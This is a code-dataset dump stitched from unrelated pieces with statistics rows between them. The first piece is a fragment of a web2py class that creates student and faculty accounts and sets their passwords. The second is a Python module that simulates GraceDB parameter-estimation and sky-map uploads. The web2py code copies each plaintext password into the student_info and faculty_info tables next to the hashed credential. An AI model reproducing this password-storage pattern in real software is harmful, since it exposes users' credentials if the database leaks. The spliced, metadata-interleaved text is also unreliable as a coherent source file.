        :param user_name: username to look up (matched case-insensitively via LIKE)
        :param new_password: plaintext password
        :param update_db: when True, also mirror the plaintext password into
                          ``student_info.student_password``
        :return: True if at least one matching account was updated
        """
        db = current.db
        ret = False
        # Get the auth_user id
        # USE LIKE TO SUPPORT CASE INSENSTIVE MATCHES
        rows = db(db.auth_user.username.like(user_name)).select()
        for row in rows:
            id = row['id']  # NOTE(review): shadows the builtin `id`
            # Set password in info table
            if update_db is True:
                db(db.student_info.account_id == id).update(student_password=new_password)
            # Set Web2py password -- validate() runs the field's validators
            # (presumably CRYPT hashing -- confirm against the table definition)
            db(db.auth_user.id == id).update(password=db.auth_user.password.validate(new_password)[0])
            ret = True
        return ret

    @staticmethod
    def SetFacultyPassword(user_name, new_password, update_db=True):
        """
        Set the password for every faculty account matching *user_name*.

        :param user_name: username to look up (matched case-insensitively via LIKE)
        :param new_password: plaintext password
        :param update_db: when True, also mirror the plaintext password into
                          ``faculty_info.faculty_password``
        :return: True if at least one matching account was updated
        """
        db = current.db
        ret = False
        #print("PW: " + user_name + str(update_db) + new_password)
        # Get the auth_user id
        # USE LIKE TO SUPPORT CASE INSENSTIVE MATCHES
        rows = db(db.auth_user.username.like(user_name)).select()
        for row in rows:
            id = row['id']  # NOTE(review): shadows the builtin `id`
            # Set password in info table
            if update_db is True:
                db(db.faculty_info.account_id == id).update(faculty_password=new_password)
            # Set Web2py password -- validate() runs the field's validators
            # (presumably CRYPT hashing -- confirm against the table definition)
            db(db.auth_user.id == id).update(password=db.auth_user.password.validate(new_password)[0])
            ret = True
        return ret

    @staticmethod
    def CreateW2PStudentUser(user_name, password, user_email, first_name, last_name, user_ad_quota, user_canvas_quota,
                             row):
        """
        Create or update a web2py student account from an import *row*.

        Inserts a new ``auth_user`` + ``student_info`` pair when no record with
        ``row.user_id`` exists; otherwise updates both records in place.  The
        account is always ensured to be a member of the 'Students' group.

        :param row: imported record providing user_id, student_name, guid,
                    class/program fields and enable/update timestamps
        :return: None
        """
        db = current.db  # Grab the current db object
        auth = current.auth  # Grab the current auth object
        # Load the user if it already exists
        user = db(db.student_info.user_id == row.user_id).select().first()
        if user is None:
            # User doesn't exist, create it
            # Create the new user in web2py
            uid = db.auth_user.insert(last_name=last_name,
                                      first_name=first_name,
                                      username=user_name,
                                      password=db.auth_user.password.validate(password)[0],
                                      email=user_email
                                      )
            # Put the user in the students group
            auth.add_membership('Students', uid)
            default_ad_quota = user_ad_quota
            default_canvas_quota = user_canvas_quota
            # Move the rest of the info in place
            # NOTE(review): account_added_on is filled from row.account_updated_on
            # (no separate added_on value in the row) -- confirm this is intended.
            db.student_info.insert(
                account_id=uid,
                user_id=row.user_id,
                student_name=row.student_name,
                student_password=password,
                import_classes=row.import_classes,
                program=row.program,
                additional_fields=row.additional_fields,
                sheet_name=row.sheet_name,
                student_guid=row.student_guid,
                account_enabled=row.account_enabled,
                account_added_on=row.account_updated_on,
                account_updated_on=row.account_updated_on,
                student_ad_quota=default_ad_quota,
                student_canvas_quota=default_canvas_quota
            )
            pass
        else:
            # Student exists, update web2py info
            db(db.auth_user.id == user.account_id).update(
                last_name=last_name,
                first_name=first_name,
                username=user_name,
                # Don't overwrite existing password, GetPasswordForStudent
                # Should have returned the current password so this is ok.
                password=db.auth_user.password.validate(password)[0],
                email=user_email
            )
            # Update user info
            user.update_record(
                student_name=row.student_name,
                student_password=password,
                import_classes=row.import_classes,
                program=row.program,
                additional_fields=row.additional_fields,
                sheet_name=row.sheet_name,
                account_enabled=row.account_enabled,
                account_updated_on=row.account_updated_on,
                student_ad_quota=user_ad_quota,
                student_canvas_quota=user_canvas_quota
            )
            # Make sure the user in the students group
            auth.add_membership('Students', user.account_id)
            pass

    @staticmethod
    def CreateW2PFacultyUser(user_name, password, user_email, first_name, last_name, user_ad_quota, user_canvas_quota,
                             row):
        """
        Create or update a web2py faculty account from an import *row*.

        Mirror of :meth:`CreateW2PStudentUser` for the ``faculty_info`` table
        and the 'Faculty' group.

        :return: None
        """
        db = current.db  # Grab the current db object
        auth = current.auth  # Grab the current auth object
        # Load the user if it already exists
        user = db(db.faculty_info.user_id == row.user_id).select().first()
        if user is None:
            # User doesn't exist, create it
            # Create the new user in web2py
            uid = db.auth_user.insert(last_name=last_name,
                                      first_name=first_name,
                                      username=user_name,
                                      password=db.auth_user.password.validate(password)[0],
                                      email=user_email
                                      )
            # Put the user in the faculty group
            auth.add_membership('Faculty', uid)
            default_ad_quota = user_ad_quota
            default_canvas_quota = user_canvas_quota
            # Move the rest of the info in place
            # NOTE(review): account_added_on is filled from row.account_updated_on
            # (no separate added_on value in the row) -- confirm this is intended.
            db.faculty_info.insert(
                account_id=uid,
                user_id=row.user_id,
                faculty_name=row.faculty_name,
                faculty_password=password,
                import_classes=row.import_classes,
                program=row.program,
                additional_fields=row.additional_fields,
                sheet_name=row.sheet_name,
                faculty_guid=row.faculty_guid,
                account_enabled=row.account_enabled,
                account_added_on=row.account_updated_on,
                account_updated_on=row.account_updated_on,
                faculty_ad_quota=default_ad_quota,
                faculty_canvas_quota=default_canvas_quota
            )
            pass
        else:
            # User exists, update web2py info
            db(db.auth_user.id == user.account_id).update(
                last_name=last_name,
                first_name=first_name,
                username=user_name,
                # Don't overwrite existing password, GetPasswordForStudent
                # Should have returned the current password so this is ok.
                password=db.auth_user.password.validate(password)[0],
                email=user_email
            )
            # Update user info
            user.update_record(
                faculty_name=row.faculty_name,
                faculty_password=password,
                import_classes=row.import_classes,
                program=row.program,
                additional_fields=row.additional_fields,
                sheet_name=row.sheet_name,
                account_enabled=row.account_enabled,
                account_updated_on=row.account_updated_on,
                faculty_ad_quota=user_ad_quota,
                faculty_canvas_quota=user_canvas_quota
            )
            # Make sure the user in the faculty group
            auth.add_membership('Faculty', user.account_id)
            pass
# EndWeb2PyAPIClass
| 40.183168 | 118 | 0.546261 | 872 | 8,117 | 4.824541 | 0.133028 | 0.030425 | 0.033278 | 0.017114 | 0.893273 | 0.864749 | 0.864749 | 0.84716 | 0.84716 | 0.84716 | 0 | 0.003636 | 0.390169 | 8,117 | 201 | 119 | 40.383085 | 0.846263 | 0.146113 | 0 | 0.727273 | 0 | 0 | 0.005512 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041958 | false | 0.146853 | 0.048951 | 0.006993 | 0.118881 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
a71fdb4f6d1e39a53c79bf27e9f275f02e05ed02 | 19,683 | py | Python | lib/pe.py | reedessick/lvalertTest | 4093961ac3e908b3a344181a033b644e5ef44421 | [
"MIT"
] | null | null | null | lib/pe.py | reedessick/lvalertTest | 4093961ac3e908b3a344181a033b644e5ef44421 | [
"MIT"
] | 14 | 2017-04-24T18:38:15.000Z | 2018-02-05T14:51:26.000Z | lib/pe.py | reedessick/lvalertTest | 4093961ac3e908b3a344181a033b644e5ef44421 | [
"MIT"
] | 3 | 2017-05-14T20:32:31.000Z | 2019-11-26T15:13:53.000Z | description = "a module that simulates Parameter Estimation uploads to GraceDB"
author = "reed.essick@ligo.org"
#-------------------------------------------------
import os
import random
import schedule
#-------------------------------------------------
'''
generate a different object for each follow-up. These may inherit from a single parent object, but they each should be able to produce data that would be uploaded to GraceDB
'''
class Bayestar():
    """
    Simulates the Bayestar rapid sky-localization follow-up for a GraceDB
    event: its schedule contains the start/finish log messages, a FITS
    sky-map upload, and the downstream plotting/skyviewer jobs.

    Each stage is described by a mean delay (*Timeout*), a gaussian spread
    (*Jitter*) and a probability that the stage happens at all (*Prob*).
    Later stages are only scheduled if the earlier stage fired.
    """

    def __init__(self, graceDBevent, startTimeout=10.0, startJitter=2.0, startProb=1.0, skymapTimeout=45.0, skymapJitter=5.0, skymapProb=1.0, finishTimeout=40.0, finishJitter=2.0, finishProb=1.0, plotSkymapTimeout=5.0, plotSkymapJitter=1.0, plotSkymapProb=1.0, skyviewerTimeout=5.0, skyviewerJitter=1.0, skyviewerProb=1.0, gdb_url='https://gracedb.ligo.org/api/'):
        """Record the target event and the per-stage timing parameters."""
        self.graceDBevent = graceDBevent
        self.gdb_url = gdb_url

        # start/finish/skymap stages of the Bayestar job itself
        self.startTimeout = startTimeout
        self.startJitter = startJitter
        self.startProb = startProb

        self.skymapTimeout = skymapTimeout
        self.skymapJitter = skymapJitter
        self.skymapProb = skymapProb

        self.finishTimeout = finishTimeout
        self.finishJitter = finishJitter
        self.finishProb = finishProb

        # downstream follow-ups triggered by the skymap upload
        self.plotSkymapTimeout = plotSkymapTimeout
        self.plotSkymapJitter = plotSkymapJitter
        self.plotSkymapProb = plotSkymapProb

        self.skyviewerTimeout = skyviewerTimeout
        self.skyviewerJitter = skyviewerJitter
        self.skyviewerProb = skyviewerProb

    def writeFITS(self, directory='.'):
        """Touch an empty ``bayestar.fits.gz`` under a per-event subdirectory and return its path."""
        dirname = "%s/%s/" % (directory, self.graceDBevent.get_randStr())
        if not os.path.exists(dirname):
            os.makedirs(dirname)
        fitsname = "%s/bayestar.fits.gz" % dirname
        open(fitsname, 'w').close()  ### may want to do more than this...
        return fitsname

    def genSchedule(self, directory='.', lvem=True):
        '''
        generate a schedule for Bayestar

        Returns a Schedule of WriteLog actions: start messages, a finish
        message, the sky-map upload (tagged sky_loc and, if *lvem*, lvem),
        and the PlotSkymaps/Skyviewer follow-up agendas shifted to start
        after the sky-map upload.
        '''
        sched = schedule.Schedule()
        if random.random() < self.startProb:
            start_dt = max(0, random.normalvariate(self.startTimeout, self.startJitter))
            for message in ['INFO:BAYESTAR:by your command...', 'INFO:BAYESTAR:starting sky localization']:
                sched.insert( schedule.WriteLog( start_dt, self.graceDBevent, message, gdb_url=self.gdb_url ) )

            if random.random() < self.finishProb:
                # finish can never be scheduled before start
                finish_dt = max(start_dt, random.normalvariate(self.finishTimeout, self.finishJitter))
                message = 'INFO:BAYESTAR:sky localization complete'
                sched.insert( schedule.WriteLog( finish_dt, self.graceDBevent, message, gdb_url=self.gdb_url ) )

                if random.random() < self.skymapProb:
                    skymap_dt = max(finish_dt, random.normalvariate(self.skymapTimeout, self.skymapJitter))
                    message = 'INFO:BAYESTAR:uploaded sky map'
                    fitsname = self.writeFITS(directory=directory)
                    tagname = ['sky_loc']
                    if lvem:
                        tagname.append( 'lvem' )
                    sched.insert( schedule.WriteLog( skymap_dt, self.graceDBevent, message, filename=fitsname, tagname=tagname, gdb_url=self.gdb_url ) )

                    ### add in plotting and skyviewer
                    agenda = PlotSkymaps(self.graceDBevent, timeout=self.plotSkymapTimeout, jitter=self.plotSkymapJitter, probOfSuccess=self.plotSkymapProb, gdb_url=self.gdb_url).genSchedule(fitsname, tagname=tagname) \
                        + Skyviewer(self.graceDBevent, timeout=self.skyviewerTimeout, jitter=self.skyviewerJitter, probOfSuccess=self.skyviewerProb, gdb_url=self.gdb_url).genSchedule(fitsname, tagname=tagname)
                    # shift the follow-ups so they run after the skymap upload
                    agenda.bump( skymap_dt )
                    sched += agenda

        return sched
class LALInference():
    """
    Simulates the LALInference online parameter-estimation follow-up:
    start/finish log messages, a posterior-samples upload, a FITS sky-map
    upload and the downstream plotting/skyviewer jobs.

    Each stage is described by a mean delay (*Timeout*), a gaussian spread
    (*Jitter*) and a probability that the stage happens at all (*Prob*).
    Later stages are only scheduled if the earlier stage fired.
    """

    def __init__(self, graceDBevent, startTimeout=10.0, startJitter=2.0, startProb=1.0, skymapTimeout=45.0, skymapJitter=5.0, skymapProb=1.0, finishTimeout=40.0, finishJitter=2.0, finishProb=1.0, plotSkymapTimeout=5.0, plotSkymapJitter=1.0, plotSkymapProb=1.0, skyviewerTimeout=5.0, skyviewerJitter=1.0, skyviewerProb=1.0, gdb_url='https://gracedb.ligo.org/api/'):
        """Record the target event and the per-stage timing parameters."""
        self.graceDBevent = graceDBevent
        self.gdb_url = gdb_url

        self.startTimeout = startTimeout
        self.startJitter = startJitter
        self.startProb = startProb

        self.skymapTimeout = skymapTimeout
        self.skymapJitter = skymapJitter
        self.skymapProb = skymapProb

        self.finishTimeout = finishTimeout
        self.finishJitter = finishJitter
        self.finishProb = finishProb

        self.plotSkymapTimeout = plotSkymapTimeout
        self.plotSkymapJitter = plotSkymapJitter
        self.plotSkymapProb = plotSkymapProb

        self.skyviewerTimeout = skyviewerTimeout
        self.skyviewerJitter = skyviewerJitter
        self.skyviewerProb = skyviewerProb

    def writeFITS(self, directory='.'):
        """Touch an empty ``lalinference_skymap.fits.gz`` under a per-event subdirectory and return its path."""
        dirname = "%s/%s/" % (directory, self.graceDBevent.get_randStr())
        if not os.path.exists(dirname):
            os.makedirs(dirname)
        fitsname = "%s/lalinference_skymap.fits.gz" % dirname
        open(fitsname, 'w').close()  ### may want to do more than this...
        return fitsname

    def writeDat(self, directory='.'):
        """Touch an empty ``posterior_samples.dat`` under a per-event subdirectory and return its path."""
        dirname = "%s/%s/" % (directory, self.graceDBevent.get_randStr())
        if not os.path.exists(dirname):
            os.makedirs(dirname)
        datname = "%s/posterior_samples.dat" % dirname
        open(datname, 'w').close()  ### may want to do more than this...
        return datname

    def genSchedule(self, directory='.', lvem=True):
        '''
        generate a schedule for LALInference

        Returns a Schedule of WriteLog actions: a start message, a finish
        message carrying the posterior-samples file, the sky-map upload
        (tagged sky_loc and, if *lvem*, lvem), and the PlotSkymaps/Skyviewer
        follow-up agendas shifted to start after the sky-map upload.
        '''
        sched = schedule.Schedule()
        if random.random() < self.startProb:
            start_dt = max(0, random.normalvariate(self.startTimeout, self.startJitter))
            message = 'LALInference online estimation started'
            sched.insert( schedule.WriteLog( start_dt, self.graceDBevent, message, gdb_url=self.gdb_url ) )

            if random.random() < self.finishProb:
                # finish can never be scheduled before start
                finish_dt = max(start_dt, random.normalvariate(self.finishTimeout, self.finishJitter))
                message = 'LALInference online estimation finished'
                filename = self.writeDat(directory=directory)
                # Bug fix: the posterior-samples file was generated but never
                # attached to the log entry; pass it along so the simulated
                # upload actually carries the .dat file.
                sched.insert( schedule.WriteLog( finish_dt, self.graceDBevent, message, filename=filename, gdb_url=self.gdb_url ) )

                if random.random() < self.skymapProb:
                    skymap_dt = max(finish_dt, random.normalvariate(self.skymapTimeout, self.skymapJitter))
                    message = 'LALInference'
                    fitsname = self.writeFITS(directory=directory)
                    tagname = ['sky_loc']
                    if lvem:
                        tagname.append( 'lvem' )
                    sched.insert( schedule.WriteLog( skymap_dt, self.graceDBevent, message, filename=fitsname, tagname=tagname, gdb_url=self.gdb_url ) )

                    ### add in plotting and skyviewer
                    agenda = PlotSkymaps(self.graceDBevent, timeout=self.plotSkymapTimeout, jitter=self.plotSkymapJitter, probOfSuccess=self.plotSkymapProb, gdb_url=self.gdb_url).genSchedule(fitsname, tagname=tagname) \
                        + Skyviewer(self.graceDBevent, timeout=self.skyviewerTimeout, jitter=self.skyviewerJitter, probOfSuccess=self.skyviewerProb, gdb_url=self.gdb_url).genSchedule(fitsname, tagname=tagname)
                    # shift the follow-ups so they run after the skymap upload
                    agenda.bump( skymap_dt )
                    sched += agenda

        return sched
class LIB():
    """
    Simulates the LALInference Burst (LIB) follow-up: start/finish log
    messages, a FITS sky-map upload and the downstream plotting/skyviewer
    jobs.

    Each stage is described by a mean delay (*Timeout*), a gaussian spread
    (*Jitter*) and a probability that the stage happens at all (*Prob*).
    Later stages are only scheduled if the earlier stage fired.
    """

    def __init__(self, graceDBevent, startTimeout=10.0, startJitter=2.0, startProb=1.0, skymapTimeout=45.0, skymapJitter=5.0, skymapProb=1.0, finishTimeout=40.0, finishJitter=2.0, finishProb=1.0, plotSkymapTimeout=5.0, plotSkymapJitter=1.0, plotSkymapProb=1.0, skyviewerTimeout=5.0, skyviewerJitter=1.0, skyviewerProb=1.0, gdb_url='https://gracedb.ligo.org/api/'):
        """Record the target event and the per-stage timing parameters."""
        self.graceDBevent = graceDBevent
        self.gdb_url = gdb_url

        self.startTimeout = startTimeout
        self.startJitter = startJitter
        self.startProb = startProb

        self.skymapTimeout = skymapTimeout
        self.skymapJitter = skymapJitter
        self.skymapProb = skymapProb

        self.finishTimeout = finishTimeout
        self.finishJitter = finishJitter
        self.finishProb = finishProb

        self.plotSkymapTimeout = plotSkymapTimeout
        self.plotSkymapJitter = plotSkymapJitter
        self.plotSkymapProb = plotSkymapProb

        self.skyviewerTimeout = skyviewerTimeout
        self.skyviewerJitter = skyviewerJitter
        self.skyviewerProb = skyviewerProb

    def writeFITS(self, directory='.'):
        """Touch an empty ``LIB_skymap.fits.gz`` under a per-event subdirectory and return its path."""
        dirname = "%s/%s/" % (directory, self.graceDBevent.get_randStr())
        if not os.path.exists(dirname):
            os.makedirs(dirname)
        fitsname = "%s/LIB_skymap.fits.gz" % dirname
        open(fitsname, 'w').close()  ### may want to do more than this...
        return fitsname

    def writeDat(self, directory='.'):
        """Touch an empty ``posterior_samples.dat`` under a per-event subdirectory and return its path.

        NOTE(review): this method is never called by genSchedule -- either
        dead code or the posterior-samples upload was never wired in; confirm.
        """
        dirname = "%s/%s/" % (directory, self.graceDBevent.get_randStr())
        if not os.path.exists(dirname):
            os.makedirs(dirname)
        datname = "%s/posterior_samples.dat" % dirname
        open(datname, 'w').close()  ### may want to do more than this...
        return datname

    def genSchedule(self, directory='.', lvem=True):
        '''
        generate a schedule for LIB

        Returns a Schedule of WriteLog actions: start/finish messages, the
        sky-map upload (tagged sky_loc and, if *lvem*, lvem), and the
        PlotSkymaps/Skyviewer follow-up agendas shifted to start after the
        sky-map upload.
        '''
        sched = schedule.Schedule()
        if random.random() < self.startProb:
            start_dt = max(0, random.normalvariate(self.startTimeout, self.startJitter))
            message = "LIB Parameter estimation started."
            sched.insert( schedule.WriteLog( start_dt, self.graceDBevent, message, gdb_url=self.gdb_url ) )

            if random.random() < self.finishProb:
                # finish can never be scheduled before start
                finish_dt = max(start_dt, random.normalvariate(self.finishTimeout, self.finishJitter))
                message = 'LIB Parameter estimation finished'
                sched.insert( schedule.WriteLog( finish_dt, self.graceDBevent, message, gdb_url=self.gdb_url ) )

                if random.random() < self.skymapProb:
                    skymap_dt = max(finish_dt, random.normalvariate(self.skymapTimeout, self.skymapJitter))
                    message = 'LIB'
                    fitsname = self.writeFITS(directory=directory)
                    tagname = ['sky_loc']
                    if lvem:
                        tagname.append( 'lvem' )
                    sched.insert( schedule.WriteLog( skymap_dt, self.graceDBevent, message, filename=fitsname, tagname=tagname, gdb_url=self.gdb_url ) )

                    ### add in plotting and skyviewer
                    agenda = PlotSkymaps(self.graceDBevent, timeout=self.plotSkymapTimeout, jitter=self.plotSkymapJitter, probOfSuccess=self.plotSkymapProb, gdb_url=self.gdb_url).genSchedule(fitsname, tagname=tagname) \
                        + Skyviewer(self.graceDBevent, timeout=self.skyviewerTimeout, jitter=self.skyviewerJitter, probOfSuccess=self.skyviewerProb, gdb_url=self.gdb_url).genSchedule(fitsname, tagname=tagname)
                    # shift the follow-ups so they run after the skymap upload
                    agenda.bump( skymap_dt )
                    sched += agenda

        return sched
class BayesWave():
    """
    Simulates the BayesWave Burst (BWB) follow-up: launch message,
    parameter-estimation result messages (tagged 'pe'), a FITS sky-map
    upload and the downstream plotting/skyviewer jobs.

    Each stage is described by a mean delay (*Timeout*), a gaussian spread
    (*Jitter*) and a probability that the stage happens at all (*Prob*).
    Later stages are only scheduled if the earlier stage fired.
    """

    def __init__(self, graceDBevent, startTimeout=10.0, startJitter=2.0, startProb=1.0, skymapTimeout=45.0, skymapJitter=5.0, skymapProb=1.0, finishTimeout=40.0, finishJitter=2.0, finishProb=1.0, plotSkymapTimeout=5.0, plotSkymapJitter=1.0, plotSkymapProb=1.0, skyviewerTimeout=5.0, skyviewerJitter=1.0, skyviewerProb=1.0, gdb_url='https://gracedb.ligo.org/api/'):
        """Record the target event and the per-stage timing parameters."""
        self.graceDBevent = graceDBevent
        self.gdb_url = gdb_url

        self.startTimeout = startTimeout
        self.startJitter = startJitter
        self.startProb = startProb

        self.skymapTimeout = skymapTimeout
        self.skymapJitter = skymapJitter
        self.skymapProb = skymapProb

        self.finishTimeout = finishTimeout
        self.finishJitter = finishJitter
        self.finishProb = finishProb

        self.plotSkymapTimeout = plotSkymapTimeout
        self.plotSkymapJitter = plotSkymapJitter
        self.plotSkymapProb = plotSkymapProb

        self.skyviewerTimeout = skyviewerTimeout
        self.skyviewerJitter = skyviewerJitter
        self.skyviewerProb = skyviewerProb

    def writeFITS(self, directory='.'):
        """Touch an empty ``BW_skymap.fits`` under a per-event subdirectory and return its path."""
        dirname = "%s/%s/" % (directory, self.graceDBevent.get_randStr())
        if not os.path.exists(dirname):
            os.makedirs(dirname)
        fitsname = "%s/BW_skymap.fits" % dirname
        open(fitsname, 'w').close()  ### may want to do more than this...
        return fitsname

    def genSchedule(self, directory='.', lvem=True):
        '''
        generate a schedule for BayesWave

        Returns a Schedule of WriteLog actions: the launch message, three
        'pe'-tagged result messages, the sky-map upload (tagged sky_loc and,
        if *lvem*, lvem), and the PlotSkymaps/Skyviewer follow-up agendas
        shifted to start after the sky-map upload.
        '''
        sched = schedule.Schedule()
        if random.random() < self.startProb:
            start_dt = max(0, random.normalvariate(self.startTimeout, self.startJitter))
            message = 'BayesWaveBurst launched'
            sched.insert( schedule.WriteLog( start_dt, self.graceDBevent, message, gdb_url=self.gdb_url ) )

            if random.random() < self.finishProb:
                # finish can never be scheduled before start
                finish_dt = max(start_dt, random.normalvariate(self.finishTimeout, self.finishJitter))
                for message in ['BWB Follow-up results', 'BWB parameter estimation', 'BWB Bayes Factors']:
                    sched.insert( schedule.WriteLog( finish_dt, self.graceDBevent, message, tagname=['pe'], gdb_url=self.gdb_url ) )

                if random.random() < self.skymapProb:
                    skymap_dt = max(finish_dt, random.normalvariate(self.skymapTimeout, self.skymapJitter))
                    message = 'BWB'
                    fitsname = self.writeFITS(directory=directory)
                    tagname = ['sky_loc']
                    if lvem:
                        tagname.append( 'lvem' )
                    sched.insert( schedule.WriteLog( skymap_dt, self.graceDBevent, message, filename=fitsname, tagname=tagname, gdb_url=self.gdb_url ) )

                    ### add in plotting and skyviewer
                    agenda = PlotSkymaps(self.graceDBevent, timeout=self.plotSkymapTimeout, jitter=self.plotSkymapJitter, probOfSuccess=self.plotSkymapProb, gdb_url=self.gdb_url).genSchedule(fitsname, tagname=tagname) \
                        + Skyviewer(self.graceDBevent, timeout=self.skyviewerTimeout, jitter=self.skyviewerJitter, probOfSuccess=self.skyviewerProb, gdb_url=self.gdb_url).genSchedule(fitsname, tagname=tagname)
                    # shift the follow-ups so they run after the skymap upload
                    agenda.bump( skymap_dt )
                    sched += agenda

        return sched
class CoherentWaveBurst():
    """
    Simulates the coherent WaveBurst (cWB) follow-up: a 'pe'-tagged
    parameter-estimation message, a FITS sky-map upload and the downstream
    plotting/skyviewer jobs.  Unlike the other follow-ups there is no
    separate "start" stage.

    NOTE(review): ``startTimeout`` is accepted for signature parity with the
    other follow-up classes but is never stored or used -- confirm whether a
    start stage was intended.
    """

    def __init__(self, graceDBevent, startTimeout=10.0, skymapTimeout=45.0, skymapJitter=5.0, skymapProb=1.0, finishTimeout=40.0, finishJitter=2.0, finishProb=1.0, plotSkymapTimeout=5.0, plotSkymapJitter=1.0, plotSkymapProb=1.0, skyviewerTimeout=5.0, skyviewerJitter=1.0, skyviewerProb=1.0, gdb_url='https://gracedb.ligo.org/api/'):
        """Record the target event and the per-stage timing parameters."""
        self.graceDBevent = graceDBevent
        self.gdb_url = gdb_url

        self.skymapTimeout = skymapTimeout
        self.skymapJitter = skymapJitter
        self.skymapProb = skymapProb

        self.finishTimeout = finishTimeout
        self.finishJitter = finishJitter
        self.finishProb = finishProb

        self.plotSkymapTimeout = plotSkymapTimeout
        self.plotSkymapJitter = plotSkymapJitter
        self.plotSkymapProb = plotSkymapProb

        self.skyviewerTimeout = skyviewerTimeout
        self.skyviewerJitter = skyviewerJitter
        self.skyviewerProb = skyviewerProb

    def writeFITS(self, directory='.'):
        """Touch an empty ``skyprobcc.fits.gz`` under a per-event subdirectory and return its path."""
        dirname = "%s/%s/" % (directory, self.graceDBevent.get_randStr())
        if not os.path.exists(dirname):
            os.makedirs(dirname)
        fitsname = "%s/skyprobcc.fits.gz" % dirname
        open(fitsname, 'w').close()  ### may want to do more than this...
        return fitsname

    def genSchedule(self, directory='.', lvem=True):
        '''
        generate a schedule for cWB

        Returns a Schedule of WriteLog actions: the 'pe'-tagged parameter
        estimation message, the sky-map upload (tagged sky_loc and, if
        *lvem*, lvem), and the PlotSkymaps/Skyviewer follow-up agendas
        shifted to start after the sky-map upload.
        '''
        sched = schedule.Schedule()
        if random.random() < self.finishProb:
            finish_dt = max(0, random.normalvariate(self.finishTimeout, self.finishJitter))
            message = 'cWB parameter estimation'
            sched.insert( schedule.WriteLog( finish_dt, self.graceDBevent, message, tagname=['pe'], gdb_url=self.gdb_url ) )

            if random.random() < self.skymapProb:
                # the skymap can never be scheduled before the PE message
                skymap_dt = max(finish_dt, random.normalvariate(self.skymapTimeout, self.skymapJitter))
                message = 'cWB skymap fit'
                fitsname = self.writeFITS(directory=directory)
                tagname = ['sky_loc']
                if lvem:
                    tagname.append( 'lvem' )
                sched.insert( schedule.WriteLog( skymap_dt, self.graceDBevent, message, filename=fitsname, tagname=tagname, gdb_url=self.gdb_url ) )

                ### add in plotting and skyviewer
                agenda = PlotSkymaps(self.graceDBevent, timeout=self.plotSkymapTimeout, jitter=self.plotSkymapJitter, probOfSuccess=self.plotSkymapProb, gdb_url=self.gdb_url).genSchedule(fitsname, tagname=tagname) \
                    + Skyviewer(self.graceDBevent, timeout=self.skyviewerTimeout, jitter=self.skyviewerJitter, probOfSuccess=self.skyviewerProb, gdb_url=self.gdb_url).genSchedule(fitsname, tagname=tagname)
                # shift the follow-ups so they run after the skymap upload
                agenda.bump( skymap_dt )
                sched += agenda

        return sched
#-----------
class PlotSkymaps():
    """
    Simulates the follow-up job that posts a Mollweide-projection png of a
    FITS sky map back to GraceDB.
    """

    def __init__(self, graceDBevent, timeout=30.0, jitter=5.0, probOfSuccess=1.0, gdb_url='https://gracedb.ligo.org/api/'):
        """Store the timing/probability parameters and the target event."""
        self.timeout = timeout
        self.jitter = jitter
        self.prob = probOfSuccess
        self.graceDBevent = graceDBevent
        self.gdb_url = gdb_url

    def genMessage(self, fits):
        """Return the log message accompanying the plot of *fits*."""
        return "Mollweide projection of %s" % fits

    def genPNG(self, fits):
        """Touch an (empty) png file named after *fits* and return its path."""
        directory = os.path.dirname(fits)
        stem = os.path.basename(fits).split('.')[0]
        png_path = os.path.join(directory, stem + ".png")
        # create the placeholder so the file exists on disk
        with open(png_path, "w"):
            pass
        return png_path

    def genSchedule(self, fits, tagname=['sky_loc']):
        """Return a Schedule containing at most one plot-upload action."""
        sched = schedule.Schedule()
        if random.random() >= self.prob:
            # the plotting job "failed"; nothing gets uploaded
            return sched
        delay = max(0, random.normalvariate(self.timeout, self.jitter))
        sched.insert(schedule.WriteLog(delay, self.graceDBevent, self.genMessage(fits),
                                       filename=self.genPNG(fits), tagname=tagname,
                                       gdb_url=self.gdb_url))
        return sched
class Skyviewer():
    """
    Simulates the follow-up job that converts a FITS sky map into the json
    file consumed by the skyviewer and uploads it to GraceDB.
    """

    def __init__(self, graceDBevent, timeout=30.0, jitter=5.0, probOfSuccess=1.0, gdb_url='https://gracedb.ligo.org/api/'):
        """Store the timing/probability parameters and the target event."""
        self.timeout = timeout
        self.jitter = jitter
        self.prob = probOfSuccess
        self.graceDBevent = graceDBevent
        self.gdb_url = gdb_url

    def genMessage(self):
        """The skyviewer upload carries no log message."""
        return ''

    def genJSON(self, fits):
        """Touch an (empty) json file named after *fits* and return its path."""
        stem = fits[:-3] if fits.endswith('.gz') else fits
        # swap the "fits" extension for "json"
        json_path = stem[:-4] + "json"
        with open(json_path, "w"):
            pass
        return json_path

    def genSchedule(self, fits, tagname=['sky_loc']):
        """Return a Schedule containing at most one skyviewer-json upload."""
        sched = schedule.Schedule()
        if random.random() >= self.prob:
            # the conversion job "failed"; nothing gets uploaded
            return sched
        delay = max(0, random.normalvariate(self.timeout, self.jitter))
        sched.insert(schedule.WriteLog(delay, self.graceDBevent, self.genMessage(),
                                       filename=self.genJSON(fits), tagname=tagname,
                                       gdb_url=self.gdb_url))
        return sched
| 48.720297 | 364 | 0.640096 | 2,045 | 19,683 | 6.081663 | 0.086553 | 0.035218 | 0.026534 | 0.027177 | 0.915253 | 0.915253 | 0.915172 | 0.907454 | 0.901102 | 0.901102 | 0 | 0.012528 | 0.249759 | 19,683 | 403 | 365 | 48.841191 | 0.829688 | 0.035513 | 0 | 0.831081 | 0 | 0 | 0.055731 | 0.00767 | 0 | 0 | 0 | 0 | 0 | 1 | 0.084459 | false | 0 | 0.010135 | 0.006757 | 0.179054 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a726ff466ed4508de18e11670400feb7fd46a72f | 41,423 | py | Python | CAAPR/CAAPR_AstroMagic/PTS/pts/evolve/Mutators.py | wdobbels/CAAPR | 50d0b32642a61af614c22f1c6dc3c4a00a1e71a3 | [
"MIT"
